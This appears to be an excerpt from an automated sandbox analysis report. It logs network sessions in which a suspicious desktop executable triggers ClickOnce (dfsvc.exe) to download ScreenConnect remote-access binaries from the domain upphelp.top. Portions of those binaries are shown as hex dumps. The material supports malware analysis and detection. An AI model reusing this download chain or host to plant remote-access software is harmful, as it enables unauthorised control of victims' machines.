2024-09-30 12:20:18 UTC	16384	IN	Data Raw: 00 4f 70 65 6e 52 65 67 69 73 74 72 79 4b 65 79 00 43 72 65 61 74 65 50 72 6f 70 65 72 74 79 4b 65 79 00 47 65 74 48 6f 74 6b 65 79 00 53 65 74 48 6f 74 6b 65 79 00 70 77 48 6f 74 6b 65 79 00 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 00 67 65 74 5f 41 73 73 65 6d 62 6c 79 00 67 65 74 5f 46 6f 6e 74 46 61 6d 69 6c 79 00 44 65 66 61 75 6c 74 46 6f 6e 74 46 61 6d 69 6c 79 00 54 72 79 44 69 73 61 62 6c 65 46 69 6c 65 53 79 73 74 65 6d 52 65 64 69 72 65 63 74 69 6f 6e 54 65 6d 70 6f 72 61 72 69 6c 79 00 73 65 74 5f 52 65 61 64 4f 6e 6c 79 00 44 69 73 70 6f 73 65 51 75 69 65 74 6c 79 00 70 6f 69 6e 74 6c 79 00 53 65 6c 65 63 74 4d 61 6e 79 00 53 68 75 74 64 6f 77 6e 42 6c 6f 63 6b 52 65 61 73 6f 6e 44 65 73 74 72 6f 79 Data Ascii: OpenRegistryKeyCreatePropertyKeyGetHotkeySetHotkeypwHotkeySystem.Security.Cryptographyget_Assemblyget_FontFamilyDefaultFontFamilyTryDisableFileSystemRedirectionTemporarilyset_ReadOnlyDisposeQuietlypointlySelectManyShutdownBlockReasonDestroy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49739	79.110.49.196	443	5576	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 12:20:19 UTC	95	OUT	GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1 Host: upphelp.top Accept-Encoding: gzip
2024-09-30 12:20:20 UTC	217	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 601376 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Mon, 30 Sep 2024 12:20:19 GMT Connection: close
2024-09-30 12:20:20 UTC	16167	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7b 3c 99 98 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 fc 08 00 00 06 00 00 00 00 00 00 92 15 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 19 78 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL{<"0 @ `x@
2024-09-30 12:20:20 UTC	16384	IN	Data Raw: 00 0a 2a 00 00 1b 30 06 00 ef 0d 00 00 2c 00 00 11 73 ab 07 00 06 0a 06 02 7d 14 03 00 04 28 75 01 00 0a 2c 1c 72 9d 0a 00 70 17 17 28 76 01 00 0a 28 77 01 00 0a 16 8d 11 00 00 01 28 78 01 00 0a 02 17 7d 48 00 00 04 02 28 e4 00 00 06 17 28 cf 01 00 0a 0b 02 28 fd 00 00 06 0c 02 28 dc 00 00 06 7e a9 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 25 07 00 06 73 d0 01 00 0a 25 80 a9 02 00 04 28 33 00 00 2b 6f d1 01 00 0a 0d 38 24 0c 00 00 12 04 09 6f d2 01 00 0a 7d 16 03 00 04 11 04 7b 16 03 00 04 28 2c 00 00 2b 13 05 11 04 7b 16 03 00 04 6f 15 03 00 06 28 36 06 00 06 13 06 11 04 7b 16 03 00 04 6f 29 03 00 06 28 4a 06 00 06 13 07 11 04 7b 16 03 00 04 6f 2a 03 00 06 28 4a 06 00 06 13 08 11 04 7b 16 03 00 04 6f 15 03 00 06 02 28 fb 00 00 06 25 13 0e 6f a2 00 00 0a Data Ascii: 0,s}(u,rp(v(w(x}H((((~%-&~%s%(3+o8$o}{(,+{o(6{o)(J{o(J{o(%o
2024-09-30 12:20:20 UTC	16384	IN	Data Raw: 02 7b 54 00 00 04 6f 0b 07 00 06 18 2e 0c 02 7b 54 00 00 04 16 6f a2 00 00 0a 2a 00 00 13 30 03 00 62 00 00 00 00 00 00 00 02 7b 54 00 00 04 6f 14 03 00 0a 2c 4d 02 7b 5a 00 00 04 28 a9 00 00 06 6f b8 04 00 06 02 7b 54 00 00 04 16 6f a2 00 00 0a 02 7b 54 00 00 04 02 7b 54 00 00 04 6f 14 03 00 0a 74 9a 00 00 01 17 6f 15 03 00 0a 26 02 7b 54 00 00 04 14 6f 7b 01 00 0a 02 17 28 3c 01 00 06 2a 02 16 28 3c 01 00 06 2a 00 00 13 30 05 00 90 00 00 00 47 00 00 11 72 1d 14 00 70 18 8d 11 00 00 01 25 16 03 8c 33 02 00 01 a2 25 17 02 7b 54 00 00 04 6f 0b 07 00 06 8c b6 00 00 02 a2 28 07 03 00 0a 02 7b 54 00 00 04 6f 0b 07 00 06 0a 06 17 2e 06 06 18 2e 27 2b 35 02 7b 5a 00 00 04 28 aa 00 00 06 6f b8 04 00 06 03 2d 22 02 28 ae 00 00 06 73 0a 03 00 0a 6f 45 01 00 0a 2b Data Ascii: {To.{To0b{To,M{Z(o{To{T{Toto&{To{(<(<*0Grp%3%{To({To..'+5{Z(o-"(soE+
2024-09-30 12:20:20 UTC	16384	IN	Data Raw: 73 27 04 00 0a 28 b2 00 00 2b 28 b3 00 00 2b 6f 28 04 00 0a 2a c2 02 28 29 04 00 0a 02 7e 2a 04 00 0a 28 2b 04 00 0a 02 20 02 60 00 00 17 28 2c 04 00 0a 02 02 fe 06 dd 01 00 06 73 2d 04 00 0a 28 2e 04 00 0a 2a 1e 02 7b 9b 00 00 04 2a 22 02 03 7d 9b 00 00 04 2a 1e 02 7b 9c 00 00 04 2a 22 02 03 7d 9c 00 00 04 2a 1e 02 7b 9d 00 00 04 2a 22 02 03 7d 9d 00 00 04 2a 1e 02 7b 9e 00 00 04 2a 22 02 03 7d 9e 00 00 04 2a 1e 02 7b 9f 00 00 04 2a 22 02 03 7d 9f 00 00 04 2a 1e 02 7b a0 00 00 04 2a 22 02 03 7d a0 00 00 04 2a 1e 02 7b a1 00 00 04 2a 22 02 03 7d a1 00 00 04 2a 1e 02 7b a2 00 00 04 2a 22 02 03 7d a2 00 00 04 2a 1e 02 7b a3 00 00 04 2a 22 02 03 7d a3 00 00 04 2a 1e 02 7b a4 00 00 04 2a 22 02 03 7d a4 00 00 04 2a 1e 02 7b a5 00 00 04 2a 22 02 03 7d a5 00 00 Data Ascii: s'(+(+o(()~(+ `(,s-(.{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}{"}
2024-09-30 12:20:20 UTC	16384	IN	Data Raw: 00 0a 2c 07 02 28 a4 02 00 06 2a 02 6f 18 04 00 0a 2a 00 00 00 13 30 02 00 51 00 00 00 93 00 00 11 02 28 61 05 00 0a 2d 1d 02 28 9b 02 00 06 12 00 fe 15 1d 00 00 01 06 28 62 05 00 0a 2c 07 02 28 9b 02 00 06 2a 02 7b ef 00 00 04 2c 1d 02 28 a2 02 00 06 12 00 fe 15 1d 00 00 01 06 28 62 05 00 0a 2c 07 02 28 a2 02 00 06 2a 02 6f 17 04 00 0a 2a d6 02 28 61 05 00 0a 2d 0f 02 28 9f 02 00 06 2c 07 02 28 9f 02 00 06 2a 02 7b ef 00 00 04 2c 0f 02 28 a6 02 00 06 2c 07 02 28 a6 02 00 06 2a 02 6f c6 04 00 0a 2a d6 02 28 61 05 00 0a 2d 0f 02 28 a1 02 00 06 2c 07 02 28 a1 02 00 06 2a 02 7b ef 00 00 04 2c 0f 02 28 aa 02 00 06 2c 07 02 28 aa 02 00 06 2a 02 28 99 02 00 06 2a 00 00 00 1b 30 06 00 f0 00 00 00 94 00 00 11 02 03 28 ce 01 00 06 02 6f c4 02 00 06 0a 12 00 28 63 Data Ascii: ,(o0Q(a-((b,({,((b,(o(a-(,({,(,(o(a-(,({,(,((*0(o(c
2024-09-30 12:20:20 UTC	16384	IN	Data Raw: 08 06 00 0a 2a 32 02 7b 38 01 00 04 6f 09 06 00 0a 2a 36 02 7b 38 01 00 04 03 6f 0a 06 00 0a 2a 00 13 30 03 00 29 00 00 00 c4 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 4f 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 c4 00 00 11 02 7b 3a 01 00 04 0a 06 0b 07 03 28 b9 00 00 0a 74 10 00 00 1b 0c 02 7c 3a 01 00 04 08 07 28 4f 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 07 00 29 00 00 00 5a 00 00 11 02 02 7b 3a 01 00 04 73 8a 03 00 06 25 02 02 7b 39 01 00 04 0a 06 17 58 7d 39 01 00 04 06 6f 89 03 00 06 28 50 01 00 2b 2a 66 02 16 7d 39 01 00 04 02 28 83 03 00 06 02 7b 38 01 00 04 6f 0b 06 00 0a 2a 1e 02 28 83 03 00 06 2a 32 02 7b 38 01 00 04 6f 0c 06 00 0a 2a 32 02 7b 38 01 00 04 28 72 01 Data Ascii: 2{8o6{8o0){:(t\|:(O+30){:(t\|:(O+30)Z{:s%{9X}9o(P+f}9({8o(2{8o*2{8(r
2024-09-30 12:20:20 UTC	16384	IN	Data Raw: 7b 3d 05 00 04 2c 0b 06 7b 3d 05 00 04 6f 22 00 00 0a dc 06 7b 3c 05 00 04 2c 0b 06 7b 3c 05 00 04 6f 22 00 00 0a dc 07 2c 06 07 6f 22 00 00 0a dc 28 60 07 00 0a 26 dc 2a 01 34 00 00 02 00 69 00 41 aa 00 14 00 00 00 00 02 00 35 00 89 be 00 14 00 00 00 00 02 00 24 00 ae d2 00 0a 00 00 00 00 02 00 14 00 c8 dc 00 07 00 00 00 00 13 30 06 00 4a 00 00 00 00 00 00 00 02 28 ad 01 00 06 02 20 16 22 00 00 17 28 2c 04 00 0a 02 17 28 b1 07 00 0a 02 22 00 00 80 3f 7d 73 01 00 04 02 7e bb 05 00 0a 28 0d 05 00 06 73 82 05 00 0a 7d 74 01 00 04 02 18 17 16 16 02 73 b2 07 00 0a 7d 71 01 00 04 2a 00 00 13 30 03 00 29 00 00 00 16 00 00 11 02 7b 78 01 00 04 0a 06 0b 07 03 28 b7 00 00 0a 74 01 00 00 1b 0c 02 7c 78 01 00 04 08 07 28 09 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 Data Ascii: {=,{=o"{<,{<o",o"(`&4iA5$0J( "(,("?}s~(s}ts}q0){x(t\|x(+3*0
2024-09-30 12:20:20 UTC	16384	IN	Data Raw: 28 d1 01 00 2b 7e 85 05 00 04 fe 06 dd 0a 00 06 73 60 01 00 0a 28 21 00 00 2b 0c 28 92 08 00 0a 08 25 2d 0b 26 d0 8c 00 00 02 28 bf 00 00 0a 6f 41 05 00 06 28 c3 04 00 06 2a 1a 7e b6 01 00 04 2a 1e 02 80 b6 01 00 04 2a 86 28 92 08 00 0a 02 6f 41 05 00 06 28 c3 04 00 06 7e aa 00 00 0a 02 6f b0 03 00 0a 6f 93 08 00 0a 2a 2e 28 c2 04 00 06 6f 5e 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 4a 05 00 06 2a 2e 28 c2 04 00 06 6f 4c 05 00 06 2a 2e 28 c2 04 00 06 6f 48 05 00 06 2a 2e 28 c2 04 00 06 6f 42 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 46 05 00 06 2a 2e 28 c2 04 00 06 6f 44 05 00 06 2a 2e 28 c2 04 00 06 6f 62 05 00 06 2a 2e 28 c2 04 00 06 6f 64 05 00 06 2a 2e 28 c2 04 00 06 6f 66 05 00 06 2a 2e 28 c2 04 Data Ascii: (+~s`(!+(%-&(oA(~(oA(~oo.(o^.(oD.(oJ.(oL.(oH.(oB.(oD.(oF.(oD.(ob.(od.(of.(
2024-09-30 12:20:20 UTC	16384	IN	Data Raw: 0a 25 80 d2 05 00 04 16 28 21 01 00 2b 2a 00 00 00 13 30 03 00 45 00 00 00 41 01 00 11 73 9f 09 00 0a 0a 06 03 7d a0 09 00 0a 02 06 fe 06 a1 09 00 0a 73 a2 09 00 0a 15 28 16 02 00 2b 7e a3 09 00 0a 25 2d 17 26 7e a4 09 00 0a fe 06 a5 09 00 0a 73 a6 09 00 0a 25 80 a3 09 00 0a 28 17 02 00 2b 2a 00 00 00 1b 30 03 00 2e 00 00 00 42 01 00 11 7e a7 09 00 0a 72 18 40 00 70 02 8c 64 00 00 01 28 1d 06 00 0a 6f a8 09 00 0a 0a 06 14 fe 03 0b de 0a 06 2c 06 06 6f 22 00 00 0a dc 07 2a 00 00 01 10 00 00 02 00 1b 00 07 22 00 0a 00 00 00 00 aa 28 01 03 00 0a 1c 16 73 02 03 00 0a 28 03 03 00 0a 2c 15 d0 23 03 00 01 28 bf 00 00 0a 6f 93 07 00 0a 28 10 06 00 06 2a 16 2a 56 28 11 06 00 06 2d 07 02 73 f2 06 00 06 2a 02 73 ed 06 00 06 2a 66 28 11 06 00 06 2d 09 02 03 04 73 e9 Data Ascii: %(!+0EAs}s(+~%-&~s%(+0.B~r@pd(o,o""(s(,#(o(V(-ss*f(-s
2024-09-30 12:20:20 UTC	16384	IN	Data Raw: 6f fc 01 00 0a 02 17 28 13 0b 00 0a 02 28 14 0b 00 0a 02 28 bb 01 00 0a 28 f9 01 00 0a 2a 76 02 28 23 08 00 0a 25 20 00 00 00 80 6f e5 04 00 0a 25 20 88 00 00 00 6f e6 04 00 0a 2a 00 13 30 05 00 bd 00 00 00 91 01 00 11 0f 01 28 f0 01 00 0a 2c 2b 02 28 df 00 00 0a 0f 01 28 f3 01 00 0a 28 15 0b 00 0a 28 7f 00 00 0a 2c 12 0f 01 28 f3 01 00 0a 28 86 00 00 0a 73 3b 05 00 0a 2a 02 02 28 f1 01 00 0a 02 28 ed 01 00 0a 02 28 f6 01 00 0a 17 28 10 07 00 06 0a 12 00 28 08 03 00 0a 2d 64 02 02 28 f1 01 00 0a 02 28 ed 01 00 0a 02 28 16 0b 00 0a 17 28 10 07 00 06 0b 12 01 28 08 03 00 0a 2d 3f 02 02 28 f6 01 00 0a 02 28 16 0b 00 0a 02 28 f1 01 00 0a 16 28 10 07 00 06 0c 12 02 28 08 03 00 0a 2d 1a 02 02 28 f6 01 00 0a 02 28 16 0b 00 0a 02 28 ed 01 00 0a 16 28 10 07 00 06 Data Ascii: o((((v(#% o% o0(,+((((,((s;*(((((-d(((((-?(((((-((((

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49740	79.110.49.196	443	5576	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 12:20:21 UTC	86	OUT	GET /Bin/ScreenConnect.Core.dll HTTP/1.1 Host: upphelp.top Accept-Encoding: gzip
2024-09-30 12:20:21 UTC	217	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 548864 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Mon, 30 Sep 2024 12:20:20 GMT Connection: close
2024-09-30 12:20:21 UTC	16167	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7a fa ad c1 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 58 08 00 00 06 00 00 00 00 00 00 ea 72 08 00 00 20 00 00 00 80 08 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 af 44 09 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELz" 0Xr D@
2024-09-30 12:20:21 UTC	16384	IN	Data Raw: 06 26 2a 1e 02 7b 6c 01 00 0a 2a 22 02 03 7d 6c 01 00 0a 2a 3a 02 28 3c 00 00 0a 02 03 28 6d 01 00 0a 2a 00 00 13 30 02 00 28 00 00 00 3c 00 00 11 03 6f 46 01 00 0a 0a 02 7b 6e 01 00 0a 2d 0f 06 28 2b 00 00 2b 2c 07 02 06 7d 6e 01 00 0a 06 02 7b 6e 01 00 0a fe 01 2a 3e 03 6f 15 07 00 06 04 6f 15 07 00 06 fe 01 2a 3e 02 03 28 6f 01 00 0a 02 15 7d 70 01 00 0a 2a 13 30 03 00 33 01 00 00 3d 00 00 11 03 2d 0a 12 01 fe 15 81 00 00 1b 07 2a 02 03 28 71 01 00 0a 0a 03 6f 15 07 00 06 02 7b 70 01 00 0a fe 01 06 5f 2c 42 02 7b 72 01 00 0a 8c 81 00 00 1b 2c 18 02 28 73 01 00 0a 02 fe 06 74 01 00 0a 73 75 01 00 0a 28 2c 00 00 2b 26 02 15 7d 70 01 00 0a 02 7c 72 01 00 0a fe 15 81 00 00 1b 12 01 fe 15 81 00 00 1b 07 2a 03 6f 15 07 00 06 02 7b 70 01 00 0a 33 07 02 7b 72 Data Ascii: &{l"}l:(<(m0(<oF{n-(++,}n{n>oo>(o}p03=-(qo{p_,B{r,(stsu(,+&}p\|r*o{p3{r
2024-09-30 12:20:21 UTC	16384	IN	Data Raw: 00 3a 02 03 28 7d 00 00 2b 28 7e 00 00 2b 26 2a 00 13 30 03 00 54 00 00 00 42 00 00 11 02 45 04 00 00 00 02 00 00 00 0c 00 00 00 20 00 00 00 16 00 00 00 2b 28 03 04 73 c6 02 00 0a 0a 2b 30 03 04 73 c7 02 00 0a 0a 2b 26 03 04 73 c8 02 00 0a 0a 2b 1c 03 04 73 94 01 00 0a 0a 2b 12 72 b9 0c 00 70 02 8c b5 00 00 02 14 73 c9 02 00 0a 7a 06 2a 5a d0 8e 00 00 1b 28 3c 01 00 0a 02 28 ca 02 00 0a a5 8e 00 00 1b 2a 9e 03 02 7e d3 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 a7 0e 00 06 73 cb 02 00 0a 25 80 d3 05 00 04 28 7f 00 00 2b 2a 00 1b 30 01 00 25 00 00 00 1e 00 00 11 02 28 cc 02 00 0a 2d 0a 12 00 fe 15 8e 00 00 1b 06 2a 00 03 6f 08 02 00 0a 0a de 07 02 28 2d 01 00 0a dc 06 2a 00 00 00 01 10 00 00 02 00 13 00 09 1c 00 07 00 00 00 00 3a 02 03 28 e9 04 00 06 28 80 Data Ascii: :(}+(~+&0TBE +(s+0s+&s+s+rpszZ(<(~%-&~s%(+0%(-o(-:((
2024-09-30 12:20:21 UTC	16384	IN	Data Raw: 00 d4 00 00 11 02 03 6f 3a 04 00 0a 0a 06 15 33 0a 12 01 fe 15 b3 01 00 1b 07 2a 02 16 06 6f 86 03 00 0a 02 06 17 58 6f f2 02 00 0a 28 59 00 00 2b 73 39 04 00 0a 2a fe 02 25 2d 06 26 7e 98 01 00 0a 03 6f 8c 01 00 0a 7e e5 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 b9 0e 00 06 73 9f 02 00 0a 25 80 e5 05 00 04 28 b3 00 00 2b 28 6e 04 00 06 28 72 00 00 2b 2a 6e 03 0f 00 28 14 04 00 0a 81 8e 00 00 1b 04 0f 00 28 15 04 00 0a 81 8f 00 00 1b 2a 3e 1f fe 73 9a 0f 00 06 25 02 7d a2 06 00 04 2a ae 02 16 16 16 16 73 27 03 00 06 7e d1 05 00 04 25 2d 13 26 14 fe 06 44 03 00 06 73 3b 04 00 0a 25 80 d1 05 00 04 28 d4 00 00 2b 2a 82 02 28 d5 00 00 2b 03 28 d5 00 00 2b 04 2d 04 16 6a 2b 02 15 6a 28 4c 05 00 06 28 d6 00 00 2b 2a 26 02 03 66 5f 04 03 5f 60 2a 76 02 28 d5 00 Data Ascii: o:3oXo(Y+s9%-&~o~%-&~s%(+(n(r+n((>s%}s'~%-&Ds;%(+(+(+-j+j(L(+&f__`v(
2024-09-30 12:20:21 UTC	16384	IN	Data Raw: 00 fd 00 00 00 1f 01 00 11 1f 12 8d b8 00 00 01 25 16 72 e8 13 00 70 a2 25 17 02 28 54 07 00 06 28 56 0b 00 06 a2 25 18 72 fe 13 00 70 a2 25 19 02 28 56 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1a 72 10 14 00 70 a2 25 1b 02 28 58 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1c 72 22 14 00 70 a2 25 1d 02 28 5a 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1e 72 34 14 00 70 a2 25 1f 09 02 28 5c 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1f 0a 72 32 13 00 70 a2 25 1f 0b 02 28 5e 07 00 06 28 56 0b 00 06 a2 25 1f 0c 72 48 14 00 70 a2 25 1f 0d 02 28 60 07 00 06 0b 12 01 fe 16 2c 01 00 02 6f 43 00 00 0a a2 25 1f 0e 72 68 14 00 70 a2 25 1f 0f 02 28 62 07 00 06 0c 12 02 fe 16 2d 01 00 02 6f 43 00 00 0a a2 25 1f 10 72 80 14 00 70 a2 25 1f 11 02 28 64 07 00 06 0d 12 03 28 2f 05 00 0a Data Ascii: %rp%(T(V%rp%(V(%rp%(X(%r"p%(Z(%r4p%(\(%r2p%(^(V%rHp%(`,oC%rhp%(b-oC%rp%(d(/
2024-09-30 12:20:21 UTC	16384	IN	Data Raw: 28 f5 01 00 06 6a 58 7d d8 03 00 04 02 02 7b d9 03 00 04 7e 2a 06 00 0a 28 81 01 00 2b 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2b 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2d 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 56 02 28 36 0a 00 06 02 03 7d da 03 00 04 02 04 7d db 03 00 04 2a 1e 02 7b da 03 00 04 2a 1e 02 7b db 03 00 04 2a 5a 03 02 28 3e 0a 00 06 5a 1e 28 19 04 00 06 02 28 3f 0a 00 06 58 2a 86 02 03 04 28 3d 0a 00 06 02 05 75 98 00 00 02 7d dc 03 00 04 02 05 75 97 00 00 02 7d dd 03 00 04 2a 86 02 03 28 63 01 00 0a 03 2c 16 02 7b dc 03 00 04 28 Data Ascii: (jX}{~(+0)Q{(+tO\|(+30)Q{(-tO\|(+3V(6}}{{Z(>Z((?X(=u}u}*(c,{(
2024-09-30 12:20:21 UTC	16384	IN	Data Raw: 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 1b 30 06 00 44 00 00 00 79 01 00 11 03 6f 16 07 00 0a 0a 2b 26 06 6f 17 07 00 0a 0b 07 04 07 6f 0a 0c 00 06 02 05 07 6f 09 0c 00 06 28 0a 09 00 06 6f 0d 0c 00 06 28 02 0c 00 06 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 b2 02 28 3c 00 00 0a 02 03 7d 3d 04 00 04 02 04 7d 3e 04 00 04 02 05 7d 3f 04 00 04 02 0e 04 7d 40 04 00 04 02 0e 05 7d 41 04 00 04 2a 1e 02 7b 3d 04 00 04 2a 1e 02 7b 3e 04 00 04 2a 1e 02 7b 3f 04 00 04 2a 1e 02 7b 40 04 00 04 2a 1e 02 7b 41 04 00 04 2a 00 00 00 1b 30 02 00 47 00 00 00 2a 00 00 11 7e 1b 07 00 0a 2d 3a 7e 1c 07 00 0a 0a 06 28 2c 01 00 0a 7e 1b 07 Data Ascii: o-,o290Dyo+&ooo(o(o-,o29(<}=}>}?}@}A{={>{?{@{A0G*~-:~(,~
2024-09-30 12:20:21 UTC	16384	IN	Data Raw: 00 06 04 3a 6a ff ff ff 2a 0a 17 2a 0a 17 2a 0a 17 2a 0a 17 2a 06 2a 00 00 13 30 05 00 1c 00 00 00 08 00 00 11 05 0e 04 8e 69 0e 05 59 28 60 01 00 0a 0a 03 04 0e 04 0e 05 06 28 32 02 00 0a 06 2a 1a 73 6a 01 00 0a 7a 1e 02 28 3c 00 00 0a 2a 2e 73 ac 0d 00 06 80 32 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 32 02 7b 33 05 00 04 6f 42 01 00 06 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 7f 01 00 0a 6f 7b 01 00 0a 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 88 01 00 0a 6f 7b 01 00 0a 2a 2e 73 b5 0d 00 06 80 38 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 03 04 28 5d 02 00 06 2a 22 03 04 28 63 02 00 06 2a 1e 02 28 3c 00 00 0a 2a 00 00 13 30 03 00 1d 00 00 00 b0 01 00 11 02 7b 3b 05 00 04 03 16 28 ef 01 00 2b 0a 12 00 1f 64 28 7a 08 00 0a 6f 36 02 00 06 2a 00 00 00 13 30 03 00 1b 00 Data Ascii: :j*****0iY(`(2sjz(<.s2(<2{3oB(<6{o{(<6{o{.s8(<"(]"(c(<0{;(+d(zo60
2024-09-30 12:20:21 UTC	16384	IN	Data Raw: 07 00 04 28 56 06 00 06 8c da 02 00 02 2a 1e 02 28 3c 00 00 0a 2a 36 02 7b 2f 0a 00 0a 16 6f 30 0a 00 0a 2a 36 02 7b 2f 0a 00 0a 17 6f 30 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 22 05 00 0a 02 7b 23 05 00 0a 28 31 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 27 05 00 0a 02 7b 28 05 00 0a 28 31 0a 00 0a 2a 2e 73 0b 10 00 06 80 25 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 22 07 00 06 2a 1e 03 6f 43 00 00 0a 2a 2e 73 0f 10 00 06 80 28 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 43 00 00 0a 2a 2e 73 12 10 00 06 80 2a 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 0f 01 28 52 0b 00 06 2a 3a 0f 01 fe 16 4e 01 00 02 6f 43 00 00 0a 2a 2e 73 16 10 00 06 80 2d 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 3a 0f 01 fe 16 c4 00 00 02 6f 43 00 00 0a 2a 1e 02 28 3c 00 00 0a 2a Data Ascii: (V(<6{/o06{/o0(<J{"{#(1(<J{'{((1.s%(<o"oC.s((<oC.s(<"(R:NoC.s-(<:oC(<
2024-09-30 12:20:21 UTC	16384	IN	Data Raw: 01 f7 02 01 00 10 00 4c b0 00 00 ad 3d 01 00 45 00 8d 01 fb 02 09 01 10 00 89 2e 01 00 ad 3d 01 00 6d 00 8d 01 fc 02 a1 00 10 00 48 26 00 00 ad 3d 01 00 00 00 90 01 03 03 81 01 10 00 fd 2b 01 00 ad 3d 01 00 35 00 90 01 04 03 01 01 00 00 a0 6a 01 00 ad 3d 01 00 c5 00 90 01 05 03 01 01 00 00 00 8e 00 00 ad 3d 01 00 c5 00 96 01 05 03 09 01 10 00 ba 36 01 00 ad 3d 01 00 6d 00 9c 01 05 03 09 01 10 00 6c 50 01 00 ad 3d 01 00 6d 00 a0 01 0d 03 09 01 10 00 4f bc 00 00 ad 3d 01 00 6d 00 a2 01 1b 03 09 01 10 00 1c 3b 01 00 ad 3d 01 00 6d 00 a4 01 26 03 09 01 10 00 12 00 01 00 ad 3d 01 00 6d 00 a8 01 4d 03 81 01 10 00 52 3b 01 00 ad 3d 01 00 35 00 ab 01 61 03 01 20 10 00 84 e3 00 00 ad 3d 01 00 35 00 ad 01 6a 03 01 20 10 00 d3 34 01 00 ad 3d 01 00 35 00 b0 01 82 03 Data Ascii: L=E.=mH&=+=5j==6=mlP=mO=m;=m&=mMR;=5a =5j 4=5

Target ID:	1
Start time:	08:19:56
Start date:	30/09/2024
Path:	C:\Users\user\Desktop\mrKs8EKXbz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\mrKs8EKXbz.exe"
Imagebase:	0x20000
File size:	83'352 bytes
